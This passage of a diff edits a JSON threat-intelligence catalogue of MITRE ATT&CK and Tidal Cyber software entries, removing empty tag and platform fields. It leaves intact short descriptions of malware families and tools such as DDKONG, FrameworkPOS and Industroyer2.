"software_attack_id": "S0360", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3016,7 +2996,6 @@ ], "software_attack_id": "S0114", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3062,7 +3041,6 @@ ], "software_attack_id": "S0252", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3086,7 +3064,6 @@ ], "software_attack_id": "S0204", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3124,7 +3101,6 @@ ], "software_attack_id": "S1063", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -3152,7 +3128,6 @@ ], "software_attack_id": "S0014", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3310,7 +3285,6 @@ ], "software_attack_id": "S0119", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -3356,7 +3330,6 @@ ], "software_attack_id": "S0454", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3380,7 +3353,6 @@ ], "software_attack_id": "S0025", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3404,7 +3376,6 @@ ], "software_attack_id": "S0274", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3424,7 +3395,6 @@ ], "software_attack_id": "S0077", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3448,7 +3418,6 @@ ], "software_attack_id": "S0351", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3486,7 +3455,6 @@ ], "software_attack_id": "S0030", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3518,7 +3486,6 @@ ], "software_attack_id": "S0484", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3538,7 +3505,6 @@ ], "software_attack_id": "S0335", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3606,7 +3572,6 @@ ], "software_attack_id": "S0462", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3626,7 +3591,6 @@ ], "software_attack_id": "S0261", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -3722,7 +3686,6 @@ ], "software_attack_id": "S1043", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -4062,7 +4025,6 @@ ], "software_attack_id": "S0144", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -4094,7 +4056,6 @@ ], "software_attack_id": "S0107", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -4165,7 +4126,6 @@ ], "software_attack_id": "S1041", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -4384,7 +4344,6 @@ ], "software_attack_id": "S0660", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -5164,7 +5123,6 @@ ], "software_attack_id": "S0369", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -5225,7 +5183,6 @@ ], "software_attack_id": "S0244", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -5354,7 +5311,6 @@ ], "software_attack_id": "S0608", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -5614,7 +5570,6 @@ ], "software_attack_id": "S0492", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -5843,7 +5798,6 @@ ], "software_attack_id": "S0614", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6065,7 +6019,6 @@ ], "software_attack_id": "S1023", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6089,7 +6042,6 @@ ], "software_attack_id": "S1024", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6159,7 +6111,6 @@ ], "software_attack_id": "S0235", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6183,7 +6134,6 @@ ], "software_attack_id": "S0538", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6207,7 +6157,6 @@ ], "software_attack_id": "S0498", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6358,7 +6307,6 @@ ], "software_attack_id": "S0527", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -6484,7 +6432,6 @@ ], "software_attack_id": "S0497", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6663,7 +6610,6 @@ ], "software_attack_id": "S1066", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6733,7 +6679,6 @@ ], "software_attack_id": "S0187", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -6828,10 +6773,8 @@ { "description": "[DDKONG](https://app.tidalcyber.com/software/0657b804-a889-400a-97d7-a4989809a623) is a malware sample that was part of a campaign by [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c). [DDKONG](https://app.tidalcyber.com/software/0657b804-a889-400a-97d7-a4989809a623) was first seen used in February 2017. [[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]", "meta": { - "platforms": [], "software_attack_id": "S0255", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -7525,7 +7468,6 @@ ], "software_attack_id": "S0200", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -7549,7 +7491,6 @@ ], "software_attack_id": "S1088", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -7667,7 +7608,6 @@ ], "software_attack_id": "S1021", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -7771,7 +7711,6 @@ ], "software_attack_id": "S0281", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -7818,7 +7757,6 @@ ], "software_attack_id": "S0695", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -7953,7 +7891,6 @@ ], "software_attack_id": "S0186", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -7977,7 +7914,6 @@ ], "software_attack_id": "S0694", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8045,7 +7981,6 @@ ], "software_attack_id": "S0547", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8294,7 +8229,6 @@ ], "software_attack_id": "S0038", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8427,7 +8361,6 @@ ], "software_attack_id": "S0024", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8492,7 +8425,6 @@ ], "software_attack_id": "S0377", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8516,7 +8448,6 @@ ], "software_attack_id": "S0593", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8586,7 +8517,6 @@ ], "software_attack_id": "S0624", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8750,7 +8680,6 @@ ], "software_attack_id": "S0064", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -8774,7 +8703,6 @@ ], "software_attack_id": "S0082", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9194,7 +9122,6 @@ ], "software_attack_id": "S0396", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9293,7 +9220,6 @@ ], "software_attack_id": "S0401", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9317,7 +9243,6 @@ ], "software_attack_id": "S0343", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9496,7 +9421,6 @@ ], "software_attack_id": "S0569", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9632,7 +9556,6 @@ ], "software_attack_id": "S0076", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9656,7 +9579,6 @@ ], "software_attack_id": "S0181", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9706,7 +9628,6 @@ ], "software_attack_id": "S0171", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9744,7 +9665,6 @@ ], "software_attack_id": "S0267", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9768,7 +9688,6 @@ ], "software_attack_id": "S0679", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9792,7 +9711,6 @@ ], "software_attack_id": "S0120", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -9846,7 +9764,6 @@ ], "software_attack_id": "S0355", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -9934,7 +9851,6 @@ ], "software_attack_id": "S0182", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10086,7 +10002,6 @@ ], "software_attack_id": "S0143", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10114,7 +10029,6 @@ ], "software_attack_id": "S0036", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10285,7 +10199,6 @@ ], "software_attack_id": "S0173", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10387,7 +10300,6 @@ { "description": "[Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [[Microsoft Forfiles Aug 2016](https://app.tidalcyber.com/references/fd7eaa47-3512-4dbd-b881-bc679d06cd1b)]", "meta": { - "platforms": [], "software_attack_id": "S0193", "source": "MITRE", "tags": [ @@ -10435,10 +10347,8 @@ { "description": "[FrameworkPOS](https://app.tidalcyber.com/software/aef7cbbc-5163-419c-8e4b-3f73bed50474) is a point of sale (POS) malware used by [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) to steal payment card data from sytems that run physical POS devices.[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]", "meta": { - "platforms": [], "software_attack_id": "S0503", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10497,7 +10407,6 @@ ], "software_attack_id": "S0277", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10749,7 +10658,6 @@ ], "software_attack_id": "S0628", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10889,7 +10797,6 @@ ], "software_attack_id": "S0666", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -10921,7 +10828,6 @@ ], "software_attack_id": "S0049", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11120,7 +11026,6 @@ ], "software_attack_id": "S0026", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11182,7 +11087,6 @@ ], "software_attack_id": "S0249", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11228,7 +11132,6 @@ ], "software_attack_id": "S0597", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11387,7 +11290,6 @@ ], "software_attack_id": "S5077", "source": "Tidal Cyber", - "tags": [], "type": "malware" }, "related": [ @@ -11407,7 +11309,6 @@ ], "software_attack_id": "S0237", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11430,7 +11331,6 @@ ], "software_attack_id": "S0690", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11450,7 +11350,6 @@ ], "software_attack_id": "S0342", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11531,7 +11430,6 @@ ], "software_attack_id": "S5079", "source": "Tidal Cyber", - "tags": [], "type": "malware" }, "related": [ @@ -11615,7 +11513,6 @@ ], "software_attack_id": "S0132", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11630,10 +11527,8 @@ { "description": "[Hacking Team UEFI Rootkit](https://app.tidalcyber.com/software/75db2ac3-901e-4b1f-9a0d-bac6562d57a3) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. [[TrendMicro Hacking Team UEFI](https://app.tidalcyber.com/references/24796535-d516-45e9-bcc7-8f03a3f3cd73)]", "meta": { - "platforms": [], "software_attack_id": "S0047", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11648,10 +11543,8 @@ { "description": "[HALFBAKED](https://app.tidalcyber.com/software/5edf0ef7-a960-4500-8a89-8c8b4fdf8824) is a malware family consisting of multiple components intended to establish persistence in victim networks. [[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]", "meta": { - "platforms": [], "software_attack_id": "S0151", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11772,10 +11665,8 @@ { "description": "[HAPPYWORK](https://app.tidalcyber.com/software/c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8) is a downloader used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target South Korean government and financial victims in November 2016. [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", "meta": { - "platforms": [], "software_attack_id": "S0214", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11799,7 +11690,6 @@ ], "software_attack_id": "S0246", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11818,10 +11708,8 @@ { "description": "[Havij](https://app.tidalcyber.com/software/8bd36306-bd4b-4a76-8842-44acb0cedbcc) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. [[Check Point Havij Analysis](https://app.tidalcyber.com/references/2e00a539-acbe-4462-a30f-43da4e8b9c4f)]", "meta": { - "platforms": [], "software_attack_id": "S0224", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -11845,7 +11733,6 @@ ], "software_attack_id": "S0391", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11865,7 +11752,6 @@ ], "software_attack_id": "S0071", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -11903,7 +11789,6 @@ ], "software_attack_id": "S0061", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12135,7 +12020,6 @@ ], "software_attack_id": "S0394", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12181,7 +12065,6 @@ ], "software_attack_id": "S0009", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12256,7 +12139,6 @@ ], "software_attack_id": "S0232", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12280,7 +12162,6 @@ ], "software_attack_id": "S0376", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12308,7 +12189,6 @@ ], "software_attack_id": "S0431", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12409,7 +12289,6 @@ ], "software_attack_id": "S0070", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12445,7 +12324,6 @@ ], "software_attack_id": "S0068", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12595,7 +12473,6 @@ ], "software_attack_id": "S0203", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12689,7 +12566,6 @@ ], "software_attack_id": "S0537", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12713,7 +12589,6 @@ ], "software_attack_id": "S1022", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -12961,10 +12836,8 @@ { "description": "[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. [[Wikipedia Ifconfig](https://app.tidalcyber.com/references/7bb238d4-4571-4cd0-aab2-76797570724a)]", "meta": { - "platforms": [], "software_attack_id": "S0101", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -12998,7 +12871,6 @@ ], "software_attack_id": "S0278", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -13284,7 +13156,6 @@ { "description": "[Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299). Security researchers assess that [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.[[Industroyer2 Blackhat ESET](https://app.tidalcyber.com/references/d9e8ca96-8646-5dd9-bede-56305385b2e4)]", "meta": { - "platforms": [], "software_attack_id": "S1072", "source": "MITRE", "tags": [ @@ -13353,7 +13224,6 @@ ], "software_attack_id": "S0259", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -13454,7 +13324,6 @@ ], "software_attack_id": "S0260", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -13469,10 +13338,8 @@ { "description": "[Invoke-PSImage](https://app.tidalcyber.com/software/2200a647-3312-44c0-9691-4a26153febbb) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [[GitHub Invoke-PSImage](https://app.tidalcyber.com/references/dd210b79-bd5f-4282-9542-4d1ae2f16438)]", "meta": { - "platforms": [], "software_attack_id": "S0231", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -13497,7 +13364,6 @@ ], "software_attack_id": "S5080", "source": "Tidal Cyber", - "tags": [], "type": "tool" }, "related": [ @@ -13512,7 +13378,6 @@ { "description": "[ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. [[TechNet Ipconfig](https://app.tidalcyber.com/references/8a6e6f59-70fb-48bf-96d2-318dd92df995)]", "meta": { - "platforms": [], "software_attack_id": "S0100", "source": "MITRE", "tags": [ @@ -13659,7 +13524,6 @@ ], "software_attack_id": "S0015", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -13709,7 +13573,6 @@ ], "software_attack_id": "S0163", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -13729,7 +13592,6 @@ ], "software_attack_id": "S0528", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -13744,7 +13606,6 @@ { "description": "[JCry](https://app.tidalcyber.com/software/41ec0bbc-65ca-4913-a763-1638215d7b2f) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.[[Carbon Black JCry May 2019](https://app.tidalcyber.com/references/deb97163-323a-493a-9c73-b41c8c5e5cd1)]", "meta": { - "platforms": [], "software_attack_id": "S0389", "source": "MITRE", "tags": [ @@ -13904,7 +13765,6 @@ ], "software_attack_id": "S0201", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14187,7 +14047,6 @@ ], "software_attack_id": "S0215", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14286,7 +14145,6 @@ ], "software_attack_id": "S0487", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14306,7 +14164,6 @@ ], "software_attack_id": "S1020", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14330,7 +14187,6 @@ ], "software_attack_id": "S0387", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14368,7 +14224,6 @@ ], "software_attack_id": "S0276", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14392,7 +14247,6 @@ ], "software_attack_id": "S0271", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14431,7 +14285,6 @@ ], "software_attack_id": "S1051", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14459,7 +14312,6 @@ ], "software_attack_id": "S0526", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14629,7 +14481,6 @@ ], "software_attack_id": "S0437", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14653,7 +14504,6 @@ ], "software_attack_id": "S0250", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -14689,7 +14539,6 @@ ], "software_attack_id": "S0641", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14709,7 +14558,6 @@ ], "software_attack_id": "S0669", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14733,7 +14581,6 @@ ], "software_attack_id": "S0162", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14757,7 +14604,6 @@ ], "software_attack_id": "S0156", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14803,7 +14649,6 @@ ], "software_attack_id": "S1075", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -14827,7 +14672,6 @@ ], "software_attack_id": "S0236", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15170,7 +15014,6 @@ ], "software_attack_id": "S0211", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15243,7 +15086,6 @@ ], "software_attack_id": "S0680", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15500,7 +15342,6 @@ ], "software_attack_id": "S0582", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15573,7 +15414,6 @@ ], "software_attack_id": "S0042", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15623,7 +15463,6 @@ ], "software_attack_id": "S0532", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15657,7 +15496,6 @@ ], "software_attack_id": "S0010", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15699,7 +15537,6 @@ ], "software_attack_id": "S0409", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15755,7 +15592,6 @@ ], "software_attack_id": "S1016", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15783,7 +15619,6 @@ ], "software_attack_id": "S1048", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15803,7 +15638,6 @@ ], "software_attack_id": "S0282", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15823,7 +15657,6 @@ ], "software_attack_id": "S1060", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -15849,7 +15682,6 @@ ], "software_attack_id": "S0413", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -15994,7 +15826,6 @@ ], "software_attack_id": "S0167", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16092,7 +15923,6 @@ ], "software_attack_id": "S0500", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -16116,7 +15946,6 @@ ], "software_attack_id": "S0459", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16259,7 +16088,6 @@ ], "software_attack_id": "S0530", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16279,7 +16107,6 @@ ], "software_attack_id": "S0443", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16303,7 +16130,6 @@ ], "software_attack_id": "S1059", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16394,7 +16220,6 @@ ], "software_attack_id": "S0688", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16860,10 +16685,8 @@ { "description": "[Miner-C](https://app.tidalcyber.com/software/c0dea9db-1551-4f6c-8a19-182efc34093a) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. [[Softpedia MinerC](https://app.tidalcyber.com/references/087b9bf1-bd9e-4cd6-a386-d9d2c812c927)]", "meta": { - "platforms": [], "software_attack_id": "S0133", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16935,7 +16758,6 @@ ], "software_attack_id": "S0083", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16955,7 +16777,6 @@ ], "software_attack_id": "S0084", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -16975,7 +16796,6 @@ ], "software_attack_id": "S0080", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -17035,10 +16855,8 @@ { "description": "[MobileOrder](https://app.tidalcyber.com/software/116f913c-0d5e-43d1-ba0d-3a12127af8f6) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4). [[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]", "meta": { - "platforms": [], "software_attack_id": "S0079", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -17114,7 +16932,6 @@ ], "software_attack_id": "S0149", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -17222,7 +17039,6 @@ ], "software_attack_id": "S1047", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -17922,7 +17738,6 @@ ], "software_attack_id": "S0233", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -17997,7 +17812,6 @@ ], "software_attack_id": "S0228", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -18114,7 +17928,6 @@ ], "software_attack_id": "S0590", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -18161,10 +17974,8 @@ { "description": "[nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e) is a utility used to troubleshoot NetBIOS name resolution. [[TechNet Nbtstat](https://app.tidalcyber.com/references/1b1e6b08-fc2a-48f7-82bd-e3c1a7a0d97e)]", "meta": { - "platforms": [], "software_attack_id": "S0102", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -18188,7 +17999,6 @@ ], "software_attack_id": "S0272", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -18212,7 +18022,6 @@ ], "software_attack_id": "S0630", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -18262,7 +18071,6 @@ ], "software_attack_id": "S0210", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -18474,7 +18282,6 @@ ], "software_attack_id": "S0056", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -18611,7 +18418,6 @@ { "description": "[netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) is an operating system utility that displays active TCP connections, listening ports, and network statistics. [[TechNet Netstat](https://app.tidalcyber.com/references/84ac26d8-9c7c-4c8c-bf64-a9fb4578388c)]", "meta": { - "platforms": [], "software_attack_id": "S0104", "source": "MITRE", "tags": [ @@ -18894,7 +18700,6 @@ ], "software_attack_id": "S0118", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -18922,7 +18727,6 @@ ], "software_attack_id": "S1090", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -19448,7 +19252,6 @@ ], "software_attack_id": "S0346", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -19468,7 +19271,6 @@ ], "software_attack_id": "S0340", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -19851,7 +19653,6 @@ ], "software_attack_id": "S0165", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -19947,7 +19748,6 @@ ], "software_attack_id": "S0402", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -19975,7 +19775,6 @@ ], "software_attack_id": "S0594", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -20026,7 +19825,6 @@ ], "software_attack_id": "S0072", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20074,7 +19872,6 @@ ], "software_attack_id": "S0016", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20130,7 +19927,6 @@ ], "software_attack_id": "S0626", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20216,7 +20012,6 @@ ], "software_attack_id": "S0208", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20235,10 +20030,8 @@ { "description": "[Pass-The-Hash Toolkit](https://app.tidalcyber.com/software/8d007d52-8898-494c-8d72-354abd93da1e) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", "meta": { - "platforms": [], "software_attack_id": "S0122", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -20595,7 +20388,6 @@ ], "software_attack_id": "S0587", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20627,7 +20419,6 @@ ], "software_attack_id": "S0643", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20788,7 +20579,6 @@ { "description": "[Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) is an operating system utility commonly used to troubleshoot and verify network connections. [[TechNet Ping](https://app.tidalcyber.com/references/5afc8ad5-f50d-464f-ba84-e347b3f3e994)]", "meta": { - "platforms": [], "software_attack_id": "S0097", "source": "MITRE", "tags": [ @@ -20921,7 +20711,6 @@ ], "software_attack_id": "S0501", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -20945,7 +20734,6 @@ ], "software_attack_id": "S0124", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21009,7 +20797,6 @@ ], "software_attack_id": "S0254", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21033,7 +20820,6 @@ ], "software_attack_id": "S0435", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21299,7 +21085,6 @@ ], "software_attack_id": "S0067", "source": "MITRE", - "tags": [], "type": "malware" 